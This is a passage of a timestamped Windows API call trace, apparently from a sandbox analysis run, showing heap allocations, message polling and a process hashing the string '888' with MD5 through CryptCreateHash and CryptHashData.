lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0145.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0145.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0145.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0145.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0145.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0145.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0145.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0145.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0145.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0145.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0145.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0145.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0145.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0145.517] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0145.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0145.517] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0145.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0145.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.678] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0145.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0145.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0145.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c50 [0145.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.683] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.684] CryptHashData (hHash=0xa87250, pbData=0x2e54ee8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0145.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.685] RtlAllocateHeap 